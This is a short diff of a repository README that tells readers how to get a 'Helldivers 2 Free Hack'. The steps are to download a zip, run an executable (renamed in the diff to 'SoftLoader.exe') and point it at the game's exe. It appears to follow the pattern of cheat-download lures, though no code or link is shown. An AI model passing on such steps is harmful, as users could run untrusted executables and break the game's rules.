hackersara/hackersara/README.md

 1. Download the Helldivers 2 Free Hack.

-2. Extract the .zip file and open Helldivers 2 Havoc Hub v1.0.4.exe.
+2. Extract the .zip file and open SoftLoader.exe

 3. Select the helldivers2.exe from your Steam directory.